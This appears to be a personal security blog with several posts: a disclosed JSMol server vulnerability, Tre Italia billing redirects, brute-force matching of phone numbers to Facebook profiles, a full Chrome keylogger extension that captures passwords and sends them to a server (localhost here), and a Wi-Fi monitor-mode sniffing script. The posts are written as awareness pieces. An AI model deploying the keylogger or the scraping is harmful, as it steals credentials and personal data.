JSMol plugin vulnerability and thoughts about security

JMol is a library used to create 3D models of molecules in Java, which can be embedded into web pages using the usual applets. JSMol is a JavaScript library which provides the Jmol capabilities through HTML5 technologies, relying on server-side computation for some functionality.

Here’s a short story about how I discovered some pretty bad vulnerabilities in the JSMol software, and how they can affect every server hosting it.

Using my university’s Moodle installation, I discovered that the JMol/JSMol plugin for Moodle was installed and probably misconfigured in some way: it had unusual permissions set in its directory tree.

This made me curious and I wanted to better understand what was going on.

I did some research and found the plugin along with its source code (the project is entirely open source), and started to look at the source of the only PHP file in the JSMol package.

Looking through the code, I found a lot of parameters used without proper sanitizing and checks, and quickly identified two related and pretty serious vulnerabilities.

The first one allows an attacker to read the entire filesystem with the PHP process’s privileges. The second is even worse, arbitrary execution of commands on the server, but it seems to have been fixed in the newer releases of the software.

Both derived from an insecure use of PHP’s file_get_contents() and exec() functions in combination with badly checked parameters coming from GET and POST variables.

I immediately contacted the developer of the plugin and reported the vulnerability, along with the maintainer of the Moodle JMol plugin.

As of today, the vulnerability has been fixed by the developer, and should be available in the latest version of the software.

Anyway, some research I’ve done suggests that the vulnerability was present on many websites using the plugin, which I think are unlikely to upgrade the software. In particular I analyzed every registered Moodle installation on moodle.net (roughly 50k) and discovered that a small fraction (~100) had the plugin installed and were vulnerable.

I would not classify it as a widespread vulnerability, but I think it should remind us of the nature of website security. In fact, I would say that every piece of software publicly accessible on a website, however small, should be a cause for concern when thinking about security.

As is often said, the best thing to do about software security is to firmly believe that you don’t have any.

A few words and an app about the strange sdc.tre.it and sdcf.tre.it redirects of Tre Italia

In the past few days I have found myself arguing with the Tre Italia customer service operators about strange redirects that were happening to me while browsing on the 3 network with my phone. Specifically, my browser was effectively being intercepted and redirected to a service belonging to the tre.it domain, in my case sdcf.tre.it, which in turn redirected to advertising sites.

Searching the web for the address, I found several people sharing the same problem, so I decided to call customer service to get some clarity.

The first call was futile, to say the least: the (not very well prepared) operator assured me that the address had absolutely nothing to do with any Tre service. This is obviously and blatantly false, since it is an address under the tre.it domain, registered by the company in question.

At this point I decided to write on the 3 customer support Facebook page, obtaining the first pieces of information:

[image: screen_assistenza_tre_sdcf]

Pressing on with customer service, another operator tried to give me more information, but she could not explain anything about these strange redirects either. The only thing I found out is that my account had been charged 14 cents for viewing “mobile publishing” content, which is attributable to newspapers that have signed contracts with Tre Italia to automatically bill the accounts of visitors who agree to view the pages with their articles. The operator assured me that when these pages appear, it must be stated somewhere that the content is paid, and of this I am sure. But I am also fairly certain that I would never have agreed to pay 7 or 9 cents per view had I been aware of it. It smells like easy money for the newspapers and for Tre.

That said, I asked that Tre never accept in the future any charges on my account that are not related to the phone subscription, such as these charges from sites like corriere.it or repubblica.it. The operator insisted that this is not possible, mumbling something about the Internet being free. I must say that even if the Internet were free, which I doubt more and more, Tre is doing everything it can to make sure it is not.

With this little rant over, which recounts my experience with Tre’s charges, let’s get to the technical part, which is better suited to this blog. I tried to build an Android application that, without needing root permissions on the phone, is able to intercept calls to the tre.it services attributable to advertising or unwanted charges. Searching the web, I discovered some addresses used by Tre for “services” whose main purpose (in my opinion) is to charge costs to unaware users, and which can even be found pre-inserted in the default browsers of Tre-branded phones. All this is an insult to the customers, if it cannot already be called fraud.

The application I developed is meant to intercept any unwanted browser redirects to these addresses:

sdc.tre.it

sdcf.tre.it

mobile.tre.it

portal.tre.it

The application is still in a testing phase; it might not work well or in every scenario, but it is a start. I have already released it hoping that it can work at least partially for those who share these problems, especially because even searching the web or calling customer service it seems these problems cannot be solved otherwise.

Here is the link to the application on the Google Play Store:

https://play.google.com/store/apps/details?id=it.nicassio.addebititreblocker

Update:

I am adding a link to a related article on bastabollette.it which also suggests a legal approach to the problem: https://bastabollette.it/telefonia/h3g/sdcf-tre-come-difendersi/

Facebook: searching people by phone number

Looking in the privacy settings of my Facebook profile, I discovered the option which indicates who can search you by the phone number you provided. The default setting is everyone.

Probably this option is intended to allow users to match friends from their phone’s address book, but it works on the desktop site too, by simply entering the phone number in the search box. It works even if you have set your phone number to be private; that is a different option.

This is pretty similar to the kind of matching done in WhatsApp or similar apps to find friends, but it is completely different when you consider that in those other services you cannot discover additional information like first and last name by providing the phone number: you just see the name you stored in your phonebook.

Using this Facebook feature lets you get a lot of information (the Facebook public profile info) by only providing the number of the person you’re interested in. That’s interesting.

Of course, to be searchable this way you need to have provided your number to Facebook in some way. But this is more and more common: Facebook asks for it on various occasions, such as for two-step verification, and likely when using the mobile Messenger app.

With that said, this service can be used to match unknown numbers, which is pretty useful [and a little creepy, if you think you can finally find out whose number is the one written on the toilet wall].

Intrigued by this possibility, I tried to brute-force the function to create a phonebook of random people from Facebook. I made a program which randomly tries a lot of numbers, waiting for matches in the search box.

Actually, it worked pretty well, and I was able to retrieve ~50 phone numbers and the related Facebook profiles by searching phone numbers similar to my own.

The program was set to run forever, but after a while Facebook notified me that I was misusing their services, and asked me to enter a captcha to verify my humanity. 🙂

This method is probably not suitable for retrieving the phone numbers of every Facebook user (actually I still think there’s a chance if you have a large number of fake Facebook accounts working simultaneously), but it could be used by spammers to find a few random numbers and the related public information (likes, hometown, etc.) to perform some targeted advertising.

My very simple Python script is bound to the Italian version of Facebook, but it is essentially very easy: it uses Selenium webdrivers to log in to Facebook and then searches for numbers in the search box, looking for changes in the search suggestions to identify a match.

Since I don’t need people to send me a Facebook friend request only because I’m in their phonebook, I changed the option from everyone to friends.

A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension and suddenly got very excited about it (yeah I know, almost every blog post I write starts like this). Then, reading about what extensions can do, I learned that extensions are not limited by the same-origin policy.

This means that if an extension makes an AJAX request, it can be directed to a server different from the domain of the current page. This can be harmful in several ways; the first I can imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server that collects it.

And that’s what I made, just to understand how difficult it was, and which kind of warning the Google Web Store would issue when you decide to add it to your browser.

Making the malicious extension

Actually, since you can inject JavaScript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
    "manifest_version": 2,
    "name": "KeyLogger",
    "description": "This extension logs everything you type.",
    "version": "1.0.1",

    "permissions": [
        "http://*/*", "https://*/*"
    ],

    "content_scripts": [{
        "matches": ["http://*/*", "https://*/*"],
        "js": ["script.js"]
    }]
}

script.js:

// One request object reused for every send; the target is localhost in this PoC
var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..');

// Re-scan the page every two seconds so fields added later are hooked as well
setInterval(function() {
    var inputs = document.getElementsByTagName('input');
    var textAreas = document.getElementsByTagName('textarea');

    // Sends the field's content to the remote server when the field loses focus
    var myLog = function(event) {
        var what = encodeURIComponent(event.srcElement.value);
        console.log("Logged: " + what);
        console.log("Sending data to remote server..");
        xmlhttp.open("GET", "http://localhost/?" + what, true);
        xmlhttp.send();
    };

    // Wraps any onblur handler the page already set, so the page keeps working
    var getHandler = function(previousHandler, obj) {
        return function(e) {
            myLog(e);
            if (previousHandler) previousHandler(e);
        };
    };

    // Only text and password inputs are interesting
    for (var i = 0; i < inputs.length; i++) {
        if (inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
            inputs[i].onblur = getHandler(inputs[i].onblur, inputs[i]);
        }
    }

    for (var i = 0; i < textAreas.length; i++) {
        textAreas[i].onblur = getHandler(textAreas[i].onblur, textAreas[i]);
    }
}, 2000);

The script is a simple implementation that sends, via AJAX requests, every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

I published it to the Chrome Web Store and tried to install it, to see what kind of warning would show up, and all I got was this:

[image: keyloggerwarning]

..not so uncommon for, say, an advertising-blocking extension:

[image: adblockpermissions]

So this blog post is here to remind you that you should only use trusted Chrome extensions. It’s very easy to steal your data with a malicious Chrome extension, it’s easy to hide some malicious code in an apparently innocent extension, and after you have installed it, it’s easy to forget about it.

Please don’t do bad things with my code and/or ideas.

Why unencrypted wireless networks are bad

A lot of times, speaking to people about home wifi and security, I hear something like this: “Why should I encrypt my home wireless network? I don’t mind sharing my internet connection, I’m ok with it as long as I don’t need my whole bandwidth”. And I can’t say that’s wrong at all.

But what these people don’t think about, which is not obvious for those who don’t know how it works, is the whole question of security: when you connect to a wifi network, you usually exchange data over the air with an access point, which is the only device supposed to receive and process it.

But when you send data through your wireless card, you’re just broadcasting it over the air, and every device close enough to your computer which is capable of receiving wireless data could potentially receive it.

As you can imagine, when you establish a connection through an access point, you’re sending data but you’re also receiving data from it. That means that every wireless card has the capability of receiving the data of a wireless connection. Obvious.

But then, how come I can surf the Internet without seeing the traffic of all the other people on the network? Of course, the wireless protocol ensures that only the data meant for my wireless card is processed, ignoring all the packets sent to others. That’s clear and reasonable.

But what you should ask now is: who guarantees that the wireless protocol works that way?

Nice question. It’s the operating system. It speaks directly to the hardware, which is meant to receive bits correctly and not much more. The card then hands the received bytes to the operating system, which interprets them and decides what to do. Usually operating systems are built to keep people from messing with the hardware itself, which is usually a good idea, so the protocols are deeply integrated with them. Here is where you come in and say: “The hardware is mine and I want to do what I want with it”. That’s why you should use Linux. Linux is free, and so are you when you use it on your computer hardware. Linux is programmed to work as you expect it would, but it always lets you do what you want if you know how (and have the right permissions).

That means yes, you can actually receive the data packets other people are broadcasting, as long as you’re close enough to the source of the wireless signal and you have a wireless card capable of doing that (most cards will work, but some cards which block this possibility in hardware do exist).

Now that you understand that you can receive others’ data, let’s go back to the encryption problem. Of course, since you’re broadcasting data over the air, you can always be received by someone else’s wireless card. But if you’re connected to an unencrypted network, you are also sending data in the clear. That means you’re broadcasting to potentially anyone everything you’re sending to the network, and they can read it in the clear. The funny thing is that, when you’re only receiving data, no one can notice it, since you’re not transmitting anything yourself. You don’t even need to be connected to the same network, you just have to listen on the right “channel”.

Fortunately, you’re not beaten yet in this privacy war. If you’re connected to an unencrypted wireless network but you’re using an encrypted service, such as https, you’re still transmitting data in the clear, but that data is https data, which has already been encrypted by the https protocol that you and the endpoint are using (and want to use). So when the malicious listener receives the wireless data, he can see it, but he’ll find it’s encrypted data.

You can now understand that all the unencrypted traffic sent through an unencrypted connection can be intercepted and read in the clear by a potential attacker.

Some examples of services that transmit unencrypted data are ftp, pop3, smtp and http. If you use one of these protocols over an unencrypted connection, you can easily be read by someone else’s computer nearby.

I’ve created a little bash script which looks for an unencrypted wireless network and starts listening for packets sent through it. Then you can use your preferred packet sniffer to display and analyze the packets received by your wireless card.

Here’s the code:

#!/bin/bash
# Wireless interface to use (change it to match your card)
dev=wlan0

echo "Setting $dev to managed mode"
sudo rfkill unblock wifi
sudo ifconfig "$dev" down; sudo iwconfig "$dev" mode managed
sudo ifconfig "$dev" up

channel=""
ssid=""
unencryptedchannel=""
sleep 2
echo "Searching for unsecured network channels"
# The scan output is split on whitespace, so each iteration sees one token
# such as "Cell", "Channel:6", "key:off" or "ESSID:\"name\""
for word in $(sudo iwlist "$dev" scan); do
    # A "Cell" token starts the next network: reset the per-cell state
    if [ "$word" == "Cell" ]; then
        channel=""
        ssid=""
    fi
    buf=$(echo "$word" | grep "Channel:" | cut -d':' -f 2)
    if [ "$buf" != "" ]; then
        echo "I've got a channel! The channel $buf"
        channel="$buf"
    fi

    essid=$(echo "$word" | grep "ESSID:" | cut -d':' -f 2)
    if [ "$essid" != "" ]; then
        echo "The essid is $essid"
        ssid="$essid"
        # iwlist prints the encryption flag before the ESSID, so once an
        # unencrypted channel has been found this ESSID belongs to it
        if [ "$unencryptedchannel" != "" ]; then
            break
        fi
    fi

    enc=$(echo "$word" | grep "key:" | cut -d':' -f 2)
    if [ "$enc" == "off" ]; then
        echo "The channel $channel has no encryption!"
        unencryptedchannel="$channel"
    fi
done

if [ "$unencryptedchannel" == "" ]; then
    echo "No unencrypted network. Quitting"
    exit
fi

echo "Your channel is $unencryptedchannel, on wifi network $ssid. Proceeding with sniffing"
sleep 1

echo "Putting $dev in monitor mode"
sudo ifconfig "$dev" down; sudo iwconfig "$dev" mode monitor
sudo ifconfig "$dev" up
sleep 1
# Some drivers need a second attempt before monitor mode sticks
while [ "$(iwconfig "$dev" | grep Monitor)" == "" ]; do
    echo "Monitor mode not set, retrying"
    sudo ifconfig "$dev" down; sudo iwconfig "$dev" mode monitor
    sudo ifconfig "$dev" up
    sleep 1
done

echo "Setting $dev to channel $unencryptedchannel"
sudo iwconfig "$dev" channel "$unencryptedchannel"
echo "Interface $dev ready for sniffing."

This code is not intended to be used for malicious purposes; it is just a proof of concept to understand the real risks of transmitting over an unencrypted network. Use this code to try to intercept your own traffic while sending emails with smtp, retrieving them with pop3, or connecting to your ftp host. You’ll better understand what I explained in this post.

It’s even possible to intercept the images you are viewing in your browser over http, yes, like Facebook photos and similar. That’s because Facebook by default avoids using https after login due to its bandwidth cost.

I should conclude by encouraging you to encrypt your wireless connection if you want to protect your privacy, or at least to be aware of the risks you take by using it with unencrypted services.